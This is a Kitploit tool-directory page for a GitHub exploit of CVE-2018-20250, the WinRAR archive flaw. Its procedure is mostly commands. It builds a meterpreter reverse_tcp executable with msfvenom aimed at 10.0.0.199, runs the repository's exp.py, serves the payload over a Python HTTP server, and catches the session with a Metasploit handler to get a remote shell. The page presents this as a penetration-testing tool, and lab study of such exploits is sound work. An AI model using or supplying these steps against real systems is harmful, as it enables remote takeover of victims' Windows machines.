Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-20250 | Kitploit
Tools/GitHubGitHub/tannlh/cve-2018-20250
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingCommand and Control
GitHubtannlh/cve-2018-20250

CVE-2018-20250

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Setup

  • Video demo: https://youtu.be/5tuWsi1tGS0
  • VirtualBox Machine: https://j2c.cc/virtualbox-machine
  • Winrar 5.5 32bit: https://j2c.cc/winrar-550-32bit

Procedure

  • Kali:
root@kitploit:~
ip a
msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=10.0.0.199 -f exe > shell.exe
  • Windows:
root@kitploit:~
git clone https://github.com/giatrung2012/CVE-2018-20250
py exp.py
  • Kali:
root@kitploit:~
python3 -m http.server
  • Windows: 10.0.0.199:8000
  • Kali:
root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set lport 1234
set lhost 10.0.0.199
exploit -j

sessions
sessions 1
sysinfo
shell
Download Tool